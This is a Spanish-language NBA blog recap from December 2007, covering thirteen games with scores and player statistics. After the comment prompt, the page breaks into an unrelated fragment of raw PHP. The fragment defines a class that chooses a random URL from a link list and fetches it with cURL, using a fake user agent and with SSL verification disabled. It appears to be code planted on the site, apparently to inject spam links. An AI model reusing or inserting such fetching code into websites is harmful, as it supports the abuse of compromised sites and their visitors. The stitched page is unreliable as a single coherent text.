La crónica (19/12/07)

20 de December de 2007 por Jabho

La jornada nos ha traído un montón de partidos. Una par de posibles finales de conferencia anticipadas, Detroit – Boston y Phoenix – Dallas, la continuación de la racha de Portland, los Bulls que parecen que quieren levantar el vuelo a costa de los Wizards, la exhibición de Chris Paul frente a Seattle, la sorpresa de Memphis ganando a San Antonio en el último segundo y muchas cosas más que os contaremos a continuación. Mientras tanto podéis ver el resumen de la jornada.

 



Bulls 95 – 84 Wizards

Un parcial de 12-0 para los Bulls en los últimos 4 minutos del partido, les hizo llevarse el gato al agua, y romper la racha de 4 victorias consecutivas de los Wizards. El máximo anotador de Chicago fue Gordon con 22 pts, bien acompañado por Luol Deng que anotó 20. Por Wizards se multiplicó Caron Butler con 29 pts, 11 rebotes y 10 asistencias (su segundo triple doble de la temporada), bien apoyado por Jamison con 24 pts y 12 rebotes. Apuntar que Ben Wallace no disputó el partido por unas molestias en el pie izquierdo, aprovechando la oportunidad el rookie Aaron Gray con 10 pts y 10 rebotes.

Bobcats 98- 92 Jazz

Funcionó el efecto Jordan que entrenó con la plantilla la última semana con el objetivo de motivar y de mejorar entre otras cosas la competitividad en finales apretados. Dicho y hecho, tremendo último cuarto de los Bobcats que remontaron 12 pts de desventaja. Gran partido de Gerald Wallace con 26 puntos, Felton, 17 puntos y 7 asistencias, el renacido Mohammed, 17 puntos, 8 rebotes, 3 tapones y de Richardson con 24 puntos y 7 rebotes. Por los Jazz el duo dinámico los mas destacados: Boozer, 21 puntos y 15 rebotes y Deron Williams 20 puntos.

Heat 111 – 117 Hawks

Vibrante partido con prórroga el disputado por dos equipos de idiosincracia muy diferente: los envejecidos Heat contra los jóvenes Hawks. Ganaron los jóvenes. El partido dejó una serie de detalles, el más importante la lesión de rodilla de Alonzo Mourning. Es posible que el veterano pivot, que ya había anunciado su retirada para la próxima temporada, vea adelantado su retiro. Otros detalles vienen de la gran cantidad de las posibles fuentes de puntos de los que dispone Atlanta. Esta noche, Joe Johnson 26 puntos y 9 asistencias, Marvin Williams 26 puntos y 10 rebotes y Anthony Johnson 21 puntos y 9 asistencias. Y eso contando con la baja de Childress y la mala noche de Josh Smith. Sin embargo, fue necesario llegar a la prórroga debido a los 36 puntos, 10 asistencias y 6 rebotes de Wade con 20 tiros libres convertidos de los 22 que intentó. En esta ocasión O’Neal aportó 16 puntos, igual que Ricky Davis, pero en su faceta reboteadora estuvo lejos de sus mejores números.

Sixers 85 – 102 Pacers

Indiana, el equipo más anotador del Este, basó su victoria de ayer en la defensa dejando a Philadelphia en unos tristes 85 puntos y 35% de acierto en tiros de campo. A pesar de recoger 14 rebotes menos y anotar tan sólo 7 tiros libres de 8 intentos, la intensidad defensiva acabó dando el triunfo a unos Pacers que sólo perdieron 8 balones. Marquis Daniels con 26 puntos fue el jugador más destacado, protagonizando además la anecdota de la jornada al pedir a su entrenador no salir en el quinteto inicial para sustituir a Jamaal Tinsley, lesionado, y así continuar con su rol habitual: el de sexto hombre. De esta manera, y jugando más minutos de los habituales, Daniels acabó con su mejor marca anotadora de la temporada. A su lado, Dunleavy y Jermaine anotaron 19 puntos cada uno. En Philadelphia Dalembert, con 15 puntos y 14 rebotes, y Reggie Evans con 6 puntos y 16 rebotes fueron los más destacados. Los habituales (Iguodala y Miller) sufrieron en exceso la intensidad defensiva de Indiana y acabaron con desastrosos porcentajes de tiro. Con esta victoria Indiana encadenada 3 triunfos consecutivos y se mantiene por encima del 50% de victorias.

Pistons 87 – 85 Celtics

Hay jugadores que son toda una garantia y, sin duda, Chancey Billups es uno de ellos. Ayer, el base de los Pistons anotó 2 tiros libres cuando faltaba tan sólo una décima de segundo para la finalización del partido, dando así la victoria a su equipo y provocando la primera derrota de los Celtics en su cancha esta temporada. El partido fue muy igualado con constantes alternativas en el marcador llegando al extremo de liderar Detroit el partido de 6 puntos a falta de 1 minuto. Pero un triple de Eddie House y otro de Ray Allen igualaron el partido y lo llevaron a unos segundos finales de infarto con conocido resultado. Billups y Hamilton fueron los mejores de su equipo con 28 y 21 puntos respectivamente sobreponiéndose al horrible partido de Prince que acabó con un 1 de 10 en tiros. Por parte céltica el mejor fue Kevin Garnett con 26 puntos y 12 rebotes seguido de Ray Allen con 24 y Rondo con 14.

Cavaliers 90 – 108 Knicks

Siguen los Cleveland Cavaliers en una clara cuesta abajo, perdiendo el noveno partido de los últimos 11 que ha disputado. Ni la gran aportación de LeBron James con 32 puntos, 8 rebotes y 6 asistencias pudo evitar que los New York Knicks consiguiera una fácil victoria que les reconcilia ligeramente con su afición. El principal problema del equipo de Cleveland es que los jugadores que más puntos anotaron tras LeBron fuéron Drew Gooden con 11 puntos y Larry Hughes con 8. Así es bastante difícil ganar partidos. Por parte de los Knicks el mejor fue David Lee, que saliendo desde el banquillo, consiguió 22 puntos, 17 en la primera mitad, y 11 rebotes. Junto a él, Crawford, que sigue en su línea responsable, con 21 puntos y 6 asistencias, y Randolph con 17 puntos y 6 rebotes. Un indicador claro de que los Knicks salieron enchufados es el porcentaje de tiro, un 56%, el mejor de toda la temporada.

Kings 102 – 89 Bucks

Se encontraron 2 equipos en estados de ánimo muy diferentes. Por un lado los Kings, que a pesar de las lesiones (Mike Bibby, Kevin Martin y Shareef Abdur-Rahim) y de contar a priori con un equipo joven sin aspiraciones serias, están realizando una campaña más que exitosa dando muchas alegrias a sus fans y demostrando que a lo mejor no hace falta desmantelar del todo el equipo. Por el otro los Bucks, un equipo a priori concebido para luchar por los playoffs, que cuenta en sus filas con grandes jugadores en cada una de las posiciones y con un banquillo más que válido, pero que lleva 6 partidos seguidos perdiendo fuera de casa y se encuentra por debajo del 50% de victorias. En el partido se demostró que la psicología también juega un valor muy importante y los Kings pasaron por encima de los Bucks sin demasiados problemas liderados por un Ron Artest, que con 26 puntos, 8 asistencias y buenos porcentajes de tiro, se convirtió en el jugador ideal. Además Udrih anotó 6 triples, récord de su cárrera, y acabó el partido con 24 puntos, demostrando que puede sustituir a Bibby sin problemas. Por los Bucks tan solo existieron Michael Redd (27 puntos) y Mo Williams (17 puntos, 7 rebotes y 5 asistencias). El resto de jugadores rindieron muy por debajo de su nivel arrastrados por la dinámica negativa del equipo.

Spurs 85 – 88 Grizzlies

Es sin duda una de las sorpresas de la jornada. Los Grizzlies, uno de los peores equipos de la NBA, ganando a los Spurs, uno de los mejores. Lo más sorprendente no es la victoria, si no cómo se ha producido. Al equipo de Memphis le cuesta mucho ganar los encuentros que llegan a los momentos finales con un marcador apretado. En esos casos se diluye como un azucarillo. Sin embargo esta vez fue capaz de mantener el tipo frente al vigente campeón gracias a un triple en el último segundo de Rudy Gay que deshacía el empate a 85. Los Grizzlies, que por cuarto partido consecutivo jugaban sin Pau Gasol, empezaron muy bien el partido y se distanciaron rápidamente,manteniendo e incluso aumentando la diferencia en el marcador hasta el final del tercer cuarto. El último cuarto empezó con 59 a 76 a favor de los Ositos, 17 puntos de diferencia. Tirando de oficio y de defensa, los Spurs consiguieron reducir la distancia hata empatar, dejando a Memphis anotar tan sólo 12 puntos. Miller fue el mejor de los Grizzlies con 31 puntos y Ginobili y Duncan los mejores de los Spurs con 20 puntos el primero y 16 puntos y 14 rebotes el segundo.

Warriors 111 – 98 Timberwolves

El quinteto titular de los Warriors se bastó para derrotar a los Timberwolves. Ese es el titular que podría resumir perfectamente el partido. Los 25 puntos de Al Harrington, 17 de ellos en el tercer cuarto, junto con los 24 de Ellis, los 20 de Jackson, 18 de Baron Davis a los que añadió 10 asistencias, y los 15 rebotes de Biedrins fueron más que suficiente para pasar por encima del equipo de Minnesota. Los Timberwolves empezaron bien el partido,llegando al descanso con 8 puntos de ventaja en el marcador. Pero su inexperiencia, unida al acierto de los Warriors, permitieron que el equipo de Oakland igualara y se marchara en el marcador en el tercer cuarto, ganando fácil el partido. Por parte de unos mermados Timberwolves, el mejor fue como casi siempre Al Jefferson con 24 puntos y 14 rebotes, siendo secundado por McCants con 23 puntos y Telfair que repartió 8 asistencias.

Magic 97 – 92 Rockets

El duelo entre los Magic y los Rockets es a su vez el duelo entre dos de los mejores pivots de la liga: Yao vs.Howard. Los números de ambos reflejan igualdad ya que Howard se fue a 21 puntos, 11 rebotes y 3 tapones, y Yao a 19 puntos y 17 rebotes aunque con malos porcentajes de tiro. Con la igualdad entre los dominadores de la zona la clave fue T-Mac. Trás la lesión de rodilla que se produjo en el partido contra Dallas, ayer McGrady fue de la partida. Sin embargo no estaba bien y después del descanso no volvió a jugar. Hasta entonces habia anotado un tiro de los diez intent.ados. Sin T-Mac sólo Alston y wells ayudaron al pivot chino ambos con 17 puntos, mientras que en Orlando hubo 6 jugadores por encima de la decena.

Suns 105 – 108 Mavericks

Esta vez sí. Por fin Dirk Nowitzki fue el líder que necesitan los Mavericks al conseguir 31 puntos y 9 rebotes y conducir a su equipo a la victoria. El jugador alemán anotó los últimos 8 puntos de su equipo en un partido con altibajos por los dos equipos. El primer cuarto fue claramente para el equipo de Dallas, en el que consiguió distanciarse en 17 puntos de su rival. Los Suns consiguieron reducir la ventaja a sólo 4 puntos en un gran segundo cuarto. En los instantes finales, el instinto ganador de Nowitzki se impuso. En Dallas destacaron además los 23 puntos y rebotes de Josh Howard y los 21 y 6 asistencias de Devin Harris. Por los Suns, el máximo anotador fue Stoudemire con 25 puntos y 8 rebotes, a los que se unieron los 23 y 10 de Marion y los 21 y 18 asistencias de Nash.

Raptors 96 – Trail Blazers 101

Se enfrentaban dos equipos en buena forma y Porland se llevó el gato al agua. Novena victoria consecutiva para los Blazers y ante un rival de prestigio, lo que le sitúa por el momento 8º en el Oeste por delante de equipos como los Rockets o los Jazz. Y en esas 9 victorias un factor común: Brandon Roy. En ocho de estos partidos el jugador de segundo año a hecho 20 o más puntos. Ayer, jugó con molestias, se quedó en 25 puntos, 9 rebotes y 8 asistencias. Anoche además se produjo otra buena noticia para los de Oregon ya que reapareció tras la lesión LaMarcus Aldrige que cuajó un buen partido con 15 putnos y 7 rebotes. Toronto por su parte fue por delante en el marcador hasta mediado el último cuarto que Porland empató a 87. a partir deahí dominaron los Blazers. A falta de 1:47 una canasta de Calderon acercaba a Toronto hasta 97-94, pero Jones mantuvo la calma, acertó con los tiros libres y se llevó el partido. Por los Raptors los mejores fueron, esperable, Bosh y Calderon.

Hornets 107 – Supersonics 93

El partido tuvo un dominador claro: Chris Paul. El base de los Hornets hizo realmente lo que quiso en el partido. Repartió 15 asistencias y dirigió el juego de su equipo con maestría. El máximo beneficiado fue Morris Peterson que anotó 25 puntos con un buen porcentaje de tiro, 9 de 14, 7 de los cuales fueron triples. Todo el quinteto titular estuvo por encima de 16 puntos. Por parte de Seattle la anotación estuvo bastante repartida con 6 jugadores por encima de 10 puntos, siendo Durant el máximo encestador con 18 puntos en una serie de 7 de 15. Pero el equipo del Este no tuvo en ningún momento la oportunidad de acercarse en el marcador.

 

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>